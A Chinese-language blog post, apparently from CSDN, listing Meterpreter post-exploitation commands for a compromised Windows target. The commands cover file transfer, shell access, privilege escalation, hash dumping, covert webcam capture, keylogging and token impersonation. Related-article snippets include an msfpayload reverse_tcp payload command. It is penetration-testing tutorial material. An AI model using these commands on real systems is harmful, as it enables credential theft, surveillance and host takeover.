msf渗透测试:merterpreter后期攻击常用方法

最新推荐文章于 2023-09-21 21:15:54 发布
最新推荐文章于 2023-09-21 21:15:54 发布
阅读量422 收藏 8
点赞数
文章标签: shell 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51646864/article/details/119677908
版权

1、上传文件到靶机:upload -r 待上传文件路径 目标位置
例如:将2.jpg文件上传到对方的C盘上(注意,目标路径是两个\,有一个用于转义)

在这里插入图片描述

2、下载靶机的文件:download -r 目标文件路径 本地保存路径
例如:将对方c盘中的2.jpg文件下载到本机的var文件夹中

在这里插入图片描述
3、在目标主机上执行exe文件:execute -f exe的文件路径
在这里插入图片描述
4、创建cmd新通道
(1)execute -f cmd -c
(2)shell(进入目标主机的cmd,常用)

5、查看靶机目前的进程:ps

6、获取admin权限:getsystem

7、转存所有hash值:hashdump

8、靶机截屏:screenshot

9、调用靶机摄像头拍照:webcam_snap

10、调用靶机摄像头录像:webcam_stream

11、键盘记录
(1)开启键盘记录: keyscan_start
(2)转存键盘记录:keyscan_dump
(3)停止记录: keyscan_stop

12、搜索文件:search -f 文件名
例如搜索所有jpg图片:search -f *.jpg
搜索2.jpg图片:search -f 2.jpg
搜索所有txt文件同理:search -f *.txt

13、获取用户id:getuid

14、获取系统信息:sysinfo

15、模拟任意用户(token):
先提权:getsystem
1、:use incognito
2、:list_tokens -u
切换到任意用户:impersonate_token “xxxx”

遥远之空
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows操作系统下Meterpreter的使用
qq_38243607的博客
07-14 1560
基本参数一览 当控制端成功与被控端连接后,主控端就会打开一个Merterpreter控制会话。 Kali Linux可以同时控制多个目标主机,可以用sessions命令,在这些会话之间进行切换。 进入到meterpreter后,使用内部的help命令,查看帮助文档。 meterpreter > help Core Commands ============= Command Description ------- ...
TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
qq_25755011的博客
02-04 6569
因为给师弟师妹布置了这个任务作为假期渗透作业,是个对ms17_010漏洞利用的学习,而且网上中文的writeup很少(好像直接没有),所以写一篇Writeup记录一下。刚好也是一个相对完整的msf使用介绍,如有错误的地方欢迎各位师傅讨论指出 tryhackme是个很好的外网网络攻防学习平台,不用VPN也可以正常使用只是稍微有点卡,各位师傅有兴趣也可以去玩一玩。这里把这题的题目链接放给大家 TryHackMe | Blue 前期准备 kali Linux (仅用到msf框架与nmap) openvpn与.
Meterpreter木马技术分析与防范
qq_40637292的博客
07-09 4246
文章转载,原文地址:http://www.bmzsec.com/archives/562.html木马被制造的原因可能有很多:有的用木马获取用于黑色产业,有的则是商家收集个人感兴趣信息以便推送类似信息达到推广效果最后从中获利,尤其在一个几乎家家户户都有电脑的时代 。因此信息时代的博弈,首要任务是网络安全。通过尝试以木马开发者的角度出发,从传统技术中木马的通信实现、驻留功能、窃取数据功能,到新技术适...
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 4528
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
msf常用命令
licheric的博客
10-20 3093
1、download命令可以下载远程主机上的文件 命令:download文件名 文件路径to保存的位置 注意:windows路径要使用双斜线【linux向左边,windows向右边】 如果我们需要递归下载整个目录包括子目录和文件,我们可以使用download -r命令 2、在目标主机上执行exe文件 execute -f c://1.exe 3、创建cmd新通道 execute -f cmd -c 4、显示进程 命令:ps 5、获取目标主机的cmd—shell shell命令可以进入目标主
浅谈MSF渗透测试
02-24
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架...下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
渗透测试常用工具应用(PDF课件)
最新发布
05-30
使用Armitage的MSF进行自动化集成渗透测试2.pdf 使用ferret进行Cookie劫持.pdf 使用SSHMitm中间人拦截SSH.pdf 使用Armitage的MSF进行自动化集成渗透测试.pdf 使用………… ……………… 使用vega对web进行漏洞扫描....
渗透测试常用poc、工具集合
01-06
本poc包含近100多个常用的poc,还有很多工具集。全是博主自己用的,现在免费分享,下面是列举的前10个poc: CVE-2019-0708-msf快速搭建 CVE-2019-10173 Xstream 1.4.10版本远程代码执行漏洞 CVE-2019-16131 OKLite v...
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
- **渗透测试**:渗透测试是一种安全评估方法,通过模拟黑客攻击来检测系统漏洞。 - **msf**:缩写词,代表Metasploit Framework,一个开源的安全测试平台,用于开发和执行渗透测试。 - **msf渗透神器windows版**:...
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)
m0_61506558的博客
09-01 4514
创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。meterpreter中输入:run post/windows/gather/enum_logged_on_users。...
MSF之meterpreter权限维持
梦想专栏
07-30 2064
00×01 首先,我们先来生成一个 meterpreter 类型的 PALOAD : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe 00×02 建立反弹处理 exploit : use exploit/mutil/handler set payload wi...
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 5381
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
shell_to_meterpreter
weixin_43268670的博客
12-29 988
转载:https://blog.csdn.net/weixin_43379478/article/details/85720083 有时候我们对目标机进行攻击的时候拿到的不一定是metepreter shell,而仅仅是一个普通的conmand shell。 本文提供一个方法能够大概率实现将conmand shell 升级为 metepreter shell. 如果你在shell中,你可以键入Ctrl+z,然后键入y,然后回车,先把shell隐藏到后台。 我们可以从shell中看到,当前sess.
MS17-010(永恒之蓝)漏洞复现
JSH_CDX的博客
03-28 974
本篇文章结合了其他人以及自己的想法,讲述了MS17-010(永恒之蓝)漏洞复现以及利用,旨在巩固知识,寻找更好的学习方法,也希望对其他人能有帮助,只要帮到一个人解决问题,这篇文章的价值便得到了体现。
Meterpreter使用总结(1)
热门推荐
CODING...
02-08 2万+
meterpreter是我最喜欢使用的攻击payload,经常都会使用windows/meterpreter/reverse_tcp作为携带的payload来进行测试,下面就meterpreter的基本使用进行一个总结:
vulnstack域环境靶场(三)
BROTHERYY的博客
12-01 810
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Meterpreter命令详解
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
菜鸟腾飞MSF
imtech的博客
01-16 791
菜鸟腾飞Metasploit Framework 渗透测试介绍
Metasploit渗透测试指南:从基础到高级功能
本篇文章将详细介绍Metasploit的基本命令和常用功能模块,以便于在渗透测试中高效利用。 **Metasploit目录结构** 在Kali Linux系统中,Metasploit的主要安装路径位于`/usr/share/metasploit-framework`,这个目录下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值